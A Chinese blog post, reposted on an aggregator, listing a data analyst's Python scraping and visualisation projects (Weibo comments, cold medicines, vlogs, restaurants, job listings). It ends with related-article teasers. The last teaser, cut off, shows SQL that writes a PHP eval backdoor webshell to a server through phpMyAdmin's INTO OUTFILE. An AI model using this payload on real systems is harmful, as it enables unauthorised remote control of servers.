程序员都用什么来记录知识_1年前的小五都用 Python 来做什么?

↑ 点击上方 “凹凸数据” 关注 + 星标 ~ 每天更新,干货不断  67931aceb349937bdf1f0a26e90ef560.pngf55f0f967933d8f9729214681ce793a0.png

(多图预警)

注:这是小五一年前在知乎的回答,当时还只有凹凸数读一个公众号,所以很多图片都会带有数读或者知乎的水印。


作为一个菜鸟数据分析师,只会sql+python

业余时间写写文章:用python爬取数据→数据清洗→数据分析→数据可视化

1bd294798f807f47ec6219ab5a2f4dbe.png
词云镇楼

20190730回来看,前面的文章好水哈哈,大家耐心往下看吧

举几个最近用python做的比较有趣的小项目:

分析30万条微博评论,看毕业生与翟天临的爱恨情仇

2019年5月27日凌晨,翟天临又上了热搜→被毕业生骂上的热搜。为了探索这个有趣的现象和背后的问题,我爬取了翟天临2月道歉微博下的30万余条评论。

53c409b63d49104119b2ee649f19a937.png
f873ff1669b36179b6c520592d2b7ca8.png

在这30万条评论中,有20多万条集中在3月2日之前,在此阶段,粉丝积极控评与吃瓜群众的嘲讽占大多数。

c0a38adaf2b337070a9d6ec535bdb1f2.png

3月2日到5月26日,随着查重标准的发布,开题、初稿等任务的进行,开始陆陆续续有学生来到他的微博下发泄怒火。这时的内容,主要分为以下几种:

a0b49d72cd57230c4394efb703230748.png

上述第二阶段中的评论用户,既不是来吃瓜的,也不是看到热搜来凑热闹的,他们是真正被论文困扰而来宣泄怒火的。因此我们爬取了他们在个人主页中填写的学校信息,发现以下学校的学生吐槽频次较高,这些学校很有可能调整了查重率或者提高了其他通过标准。

5b55f0e6ff136b17359b3e587a049bd9.png

评论“睡了吗”的同学中,基本集中在半夜11点到凌晨3点的时间段,这时的同学经历了漫长的改重洗礼,用残存的力气也要去问候翟天临一句。而到了3点以后,怕是连问一句“睡了吗”的心情都没有了(因为他肯定睡了)

459e7e07ae484b4bc3df4ef91f544111.png

以上是截取的文章部分,原文链接请戳《分析30万条微博评论,看毕业生与翟天临的爱恨情仇》

拆开药店所有的感冒药,用数据解读药品说明书

这篇文章的起因是我感冒了,翻出了家里仅剩半盒的感冒药,但说明书早已不翼而飞。机智的我在网上药店里搜到了这款药品,了解了它的用量和禁忌等。依然心系工作的我正好顺势爬取了康之家网上药店在售的654种感冒药的说明书,决定用数据解读一下!

8cc4ecf7195ff46dda71059f2b7a342f.png

在感冒药界,要问哪家品牌的种类最多,同仁堂是当之无愧的王者,而且这家店是标准中国老字号,只生产中药类感冒药。

a2755d3651153b0bb514a806d39c56e9.png

将中药与西药的成份分别进行了汇总,并且绘制成词云。

34e7f1ce0afe2210506675365bcac7da.png
e12732dbfe2425553028bc755c7855bb.png

工作了之后越发觉得生个病真是太贵了,不去医院光吃药就要花掉不少毛爷爷,于是看过了说明书的有趣数据,我们自然而然把目光转向了……价格。我们对比了西药和中药,发现西药的价格集中在20元左右,而中药的价格要更低一些,集中在10元左右。

4f2206a0c01e2868b7949de071a1aaec.png

以上是截取的文章部分,原文链接请戳:《拆开药店所有的感冒药,用数据解读药品说明书》

素人与欧阳娜娜的vlog之间,相隔的不只是明星光环

这篇主要是为了研究vlog究竟是“真风口”还是“伪风口”,我们爬取了国内最大原创 Vlog 平台“Vue Vlog”app上的30万条视频及其作者的信息。

cbd6a73b27bebf7fb828f0d4c325967a.png

从整体上看,在Vue Vlog上发过视频的用户中,90后,即20—30岁左右的年轻人,占据了vlogger的半壁江山。而在各个年龄段,女性都明显多于男性。相比于男性而言,女性似乎更乐于分享自己的生活。有趣的是,水瓶座在所有vlogger的星座中占比最高,是其他星座的2倍左右。

5146cc3d0b346e1c607f08a49bf8c4ec.png
这里要注明一下,右侧单纯是星座的排行,本意是突出显示一下第一名水瓶座,结果用的配色是左侧男性的颜色,很容易让大家误解是男性且水瓶座排名第一

从时长上看,普通用户的大部分视频都在1分钟以内,而大V集中在3-8分钟。

9a0479a17842258b4866cc522115c14f.png

我们分析了vlog发布时间段对平均播放量的影响,发现在一周当中,周五的平均播放量明显高于其他时间段。

c6d7332aadf4e4a18bea85fb999ebaf7.png

平均播放量最高的时间点则有几个小高峰。早上起床的8、9点,中午和晚上下班放学的12点和5点,以及晚上睡觉前的9点左右,都是发视频的好时机。而凌晨2-4点由于发视频数量较少,平均播放量也整体较高。

从内容类型来看,普通vlogger作品中播放量比较高的多数具备一些专业技能,如滑雪和潜水等极限运动,以及摄影、弹唱等个人才艺。

c467553cac206e93f345c758aaf1e37d.png

以上是截取的文章部分,原文链接请戳:《素人与欧阳娜娜的vlog之间,相隔的不只是明星光环》

第一批看《复联4》的网友,都在评论区说了什么?

原文链接:《第一批看《复联4》的网友,都在评论区说了什么?》

爬取了微博、猫眼、知乎、豆瓣的评论或者回答做成了词云

3113175b350457a86e6a2a9343bd66a2.png

五一去长沙,到了吃点啥?

在大众点评的筛选机制中,只能按单项指标排序,而智能排序又会把投放广告的或者新店优先排在前面。于是,我们爬取了大众点评上橘子洲头附近4312家长沙美食的基础信息。我们设定的筛选目标湘菜馆的要求是:评论人数超过500,各项评分均在9分以上,人均消费不超过100。

70685d73c7f1ee64b8fbf1b75fe396f1.png

我们又用同样的方法,筛选出性价比最高的烧烤、火锅、小龙虾、臭豆腐、粉面馆、饮品……

3be8bb0405c6ba800e270f8dc9f11c4a.png
1b088b66df25a2ea2320e39cd54a1842.png

以上是截取的文章部分,原文链接请戳:《五一去长沙,到了吃点啥?》

十张图告诉你:互联网运营狗的生存现状

我们爬取了实习僧和拉勾网上共12715条关于运营的招聘信息,来更好地了解运营狗生存(主要是工资)现状。

在城市的选择上,我们发现,北京对于运营实习生的需求量最大,上海广州深圳杭州依次递减。要来运营岗实习,一线城市对你来说,将是机会最多的选择。

7f45c4158938ab247eddbd70fca8e3f1.png

但一线城市的三餐、交通与房租对于实习生来说,无疑是很大的压力。因此我们分析了不同地域运营实习生的日均薪资水平,看看哪些城市的薪水能让你吃到更好吃的土。

b0464fa71742d9ab7ec30062662e3ccf.png

其中日均实习工资在100-150范围的岗位,在大部分城市都超过了50%的占比,这也是运营实习生最可能拿到的工资。而在北上深三地,实习生拿到“高薪”(日工资超过150元)的可能性明显高于其他地区。相对这些城市来讲,广州运营实习工资低于100的岗位占比较高,在广州实习的同学将有更多进入hard生存模式。


20190730更新,没想到大家这么支持,那就再更新几个(每个简单只放一张图):

蔡徐坤1亿转发量幕后推手被封,能否动摇饭圈文化?

a6adf1e65eb4c2c54c769c6b4bb2f83d.png

原文链接请戳:《蔡徐坤1亿转发量幕后推手被封,能否动摇饭圈文化?》

290种零食大统计,谁能唤起80、90后的童年回忆?

91e0e8630a66541f579482ed03ac3c4d.png

原文链接请戳:《290种零食大统计,谁能唤起80、90后的童年回忆?》

宫崎骏:纵有疾风起,人生不言弃。

5156756e48f2ca72df18b5e65a3422d7.png

原文链接请戳:《宫崎骏:纵有疾风起,人生不言弃。》

中国撸串指北:13万家烧烤店的吃货最爱

617db1d209ff4bbb64a615c41adf9410.png

原文链接请戳:《中国撸串指北:13万家烧烤店的吃货最爱》

这里面都是小五一年前做的有趣的事,大家更喜欢哪一个呢?

欢迎留言、点赞、分享~~~

89745521fbebbe23c70b8a5ba34ce790.gif

24a82140eac1ebc7d23ea7002d4986d8.pngc326c2b957d98817cf7fc8d94d06b766.png

4c8e70b29342d3b229a704e06d756a59.gif

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/373926.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

CSDN编程挑战——《高斯公式》

高斯公式 题目详情: 高斯在上小学时发明了等差数列求和公式:12..1005050。现在问题在于给你一个正整数n,问你他可以表示为多少种连续正整数之和?(自身也算)。 输入格式: 多组数据,每组数据一行&#xff0c…

SQL-行转列(PIVOT)实例1

--未旋转之前的查询结果 select s.Name ShiftName,h.BusinessEntityID,d.Name as DpartmentName from HumanResources.EmployeeDepartmentHistory h inner join HumanResources.Department d on h.DepartmentIDd.DepartmentIDinner join HumanResources.Shift s on s.ShiftIDh…

将MongoDB与Morphia结合使用

在过去的几年中, NoSQL数据库(例如CouchDB,Cassandra和MongoDB)在不需要运行传统RDBMS的语义和开销的应用程序中得到了普及。 我不会进入选择NoSQL数据库的设计决策,因为其他人已经做得很好,但是我将结合我…

webservice接口_webservice服务器端发票识别接口

关键词:发票识别 私有云发票识别 发票识别API接口 webservice发票识别平台发票,一个再也熟悉不过的财务往来凭证,录入发票,一项让多少财会人员头疼的工作。过去录入一张发票需要一个财会人员5分钟的时间,那么这个人在工…

二叉树学习——简单入门题

入门题一: 输入一颗二叉树,你的任务是按从上到下、从左到右的顺序输出各个节点的值。每个节点都按照从根节点到它的移动序列给出 (L表示左,R表示右)。在输入中,每个节点的左括号和右括号之间没有空格&#…

java8-4 多态的练习以及题目

1、/* 多态练习:猫狗案例*/ 1 class Animal {2 public void eat(){3 System.out.println("吃饭");4 }5 }6 7 class Dog extends Animal {8 public void eat() {9 System.out.println("狗吃肉"); 10 } 11 12 public void lookDoor() { 13 Syste…

一个简单的socket通信小demo

写了一个socket的程序,可以和本地的服务器进行通信,要先和服务器建立链接,然后发送登录信息,验证成功,就可以和服务器通信了 1 页面截图 2 点击链接服务器,可以链接服务器,服务器的ip地址为&…

Java并发教程– CountDownLatch

Java中的某些并发实用程序自然会比其他并发实用程序受到更多关注,因为它们可以解决通用问题而不是更具体的问题。 我们大多数人经常遇到执行程序服务和并发集合之类的事情。 其他实用程序不太常见,因此有时它们可​​能会使我们逃脱,但是请记…

汉仪尚巍手书可以商用吗_【商用车维修】夏天修空调可以撑起全年修车收入的一半,你会了吗?...

更多精彩,请点击上方蓝字关注我们!车载空调是炎热的季节必不可少的利器,但用得多,毛病也多了起来,今天和大家分享一些空调系统的相关知识,助力修车师傅们来应对空调系统的相关故障问题。如何判断制冷系统的…

CSDN编程挑战——《-3+1》

-31 题目详情: 有一个数列,所有的数都是非负整数,你可以进行如下方式进行一次操作(注意一次完整的操作必须先后完成如下两个步骤): (1) 任选一个不小于3的数,把它减少3。 &#xff…

游戏感悟

1.所谓游戏平衡,就是指玩家没有最优解。 2.所谓公司的文化,就是指员工被公司洗脑的那些观点(认知)。 3.人是能动的,摆脱平庸。转载于:https://www.cnblogs.com/yangzhou33/p/5074509.html

Git 简单使用

1.Git是什么 简介:Git是 Linux 之父 Linus Trovalds,为管理 Linux 内核代码而建立的,被认为是分布式版本控制工具中的顶级水准。智能、友好、强健、高效。 作用:新建一个分支,把服务器上最新版的代码fetch下来&#x…

Vaadin附加组件和Maven

介绍 我喜欢Vaadin的 (众多)一件事是它对Vaadin框架的“附加组件”社区-他们称之为Vaadin目录 。 “附加组件”是框架中社区贡献的附加组件,可以是任何东西,例如从新的客户端小部件到数据表的延迟加载容器。 我肯定会为Activiti看…

八皇后时间复杂度_【算法打卡】N皇后

难度:困难题目:n 皇后问题研究的是如何将 n 个皇后放置在 nn 的棋盘上,并且使皇后彼此之间不能相互攻击。上图为 8 皇后问题的一种解法。给定一个整数 n,返回 n 皇后不同的解决方案的数量。提示:皇后,是国际…

Android-Binder 简析

前言 对于Android来说,Binder的重要性怎么说都不为过。不管是我们的四大组件Activity、Service、BroadcastReceiver、ContentProvider,还是经常在应用中使用到的各种ServiceManager,其背后都是Binder在支撑。然而Binder机制又不是三言两语能够…

CSDN编程挑战——《进制转换》

进制转换 题目详情: 我们通常用的十进制数包含0-9十个数字。假设有一种进制系统包含3种数字,从低到高分别为"oF8”,那么从1到9分别表示为F, 8, Fo, FF, F8, 8o, 8F, 88, Foo, FoF。给定一种进制的数和两种进制的数字表,请把它从第一种进…

tplink 703刷固件

1.软件下载: ImageBuilder链接 如果是全新刷机的话,使用:http://downloads.openwrt.org/snapshots/trunk/ar71xx/generic/openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin 如果是系统升级的话,使用:http://downloads.openwrt.org/snapshots/trunk/ar71xx/generic/op…

编程反模式

您是否曾经进行过代码审查,记录了非常高的WTF / m? 您是否想知道所有这些错误代码的原因是什么? 在大多数情况下,导致原因1的主要原因是使用设计和编码反模式。 如果您喜欢定义,请参见以下内容:AntiPatter…

python概率密度函数参数估计_EM算法求高斯混合模型参数估计——Python实现

#coding:gbkimport mathimport copyimport numpy as npimport matplotlib.pyplot as pltisdebug False# 指定k个高斯分布参数,这里指定k2。注意2个高斯分布具有相同均方差Sigma,分别为Mu1,Mu2。def ini_data(Sigma,Mu1,Mu2,k,N):global Xglobal Mugloba…

phpmyadmin 各种技巧拿 webshell

site.com/phpMyAdminsite.com/sqlD:\wamp\www账号还有密码root 密码第一种CREATE TABLE mysql.darkmoon (darkmoon1 TEXT NOT NULL );INSERT INTO mysql.darkmoon (darkmoon1 ) VALUES (<?php eval($_POST[pass]);?>);SELECT darkmoon1 FROM darkmoon INTO OUTFILE d:/…